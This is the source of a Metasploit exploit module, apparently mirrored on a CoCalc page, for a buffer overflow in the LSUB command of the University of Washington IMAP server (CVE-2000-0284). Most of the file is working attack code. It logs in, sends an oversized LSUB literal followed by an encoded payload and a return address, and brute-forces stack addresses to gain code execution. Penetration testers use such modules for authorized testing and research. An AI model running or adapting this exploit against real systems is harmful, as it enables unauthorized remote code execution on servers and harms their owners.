Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/imap/imap_uw_lsub.rb
19720 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Brute

10
  include Msf::Exploit::Remote::Imap

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'UoW IMAP Server LSUB Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in the 'LSUB'

19
          command of the University of Washington IMAP service.

20
          This vulnerability can only be exploited with a valid username

21
          and password.

22
        },

23
        'Author' => [ 'aushack', 'jduck' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2000-0284' ],

27
          [ 'OSVDB', '12037' ],

28
          [ 'BID', '1110' ],

29
          [ 'EDB', '284' ]

30
        ],

31
        'Privileged' => false,

32
        'Payload' => {

33
          'Space' => 964,

34
          'BadChars' => "\x00\x0a\x0d\x2f",

35
          'StackAdjustment' => -3500

36
        },

37
        'Platform' => 'linux',

38
        'Targets' => [

39
          # ['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],

40
          [

41
            'Linux Bruteforce',

42
            {

43
              'Platform' => 'linux',

44
              'Offset' => 1064,

45
              'Bruteforce' =>

46
                {

47
                  'Start' => { 'Ret' => 0xbffffdfc },

48
                  'Stop' => { 'Ret' => 0xbfa00000 },

49
                  'Step' => 200

50
                }

51
            },

52
          ]

53
        ],

54
        'DisclosureDate' => '2000-04-16',

55
        'DefaultTarget' => 0,

56
        'Notes' => {

57
          'Stability' => [CRASH_SERVICE_RESTARTS],

58
          'SideEffects' => [IOC_IN_LOGS],

59
          'Reliability' => [UNRELIABLE_SESSION]

60
        }

61
      )

62
    )

63
  end

64


65
  def check

66
    connect

67
    disconnect

68


69
    if banner =~ /IMAP4rev1 v12\.264/

70
      return CheckCode::Appears('IMAP4rev1 v12.264')

71
    end

72


73
    CheckCode::Safe

74
  end

75


76
  def brute_exploit(addresses)

77
    print_status('Trying 0x%.8x ...' % addresses['Ret'])

78


79
    fail_with(Failure::NoAccess, 'Unable to log in!') unless connect_login

80


81
    req = "a002 LSUB \"\" {%d}\r\n" % target['Offset']

82
    sock.put(req)

83
    sock.get_once

84


85
    sploit = payload.encoded + rand_text_alphanumeric(64) + [addresses['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"

86
    sock.put(sploit)

87


88
    handler

89
    disconnect

90
  end

91
end

92


93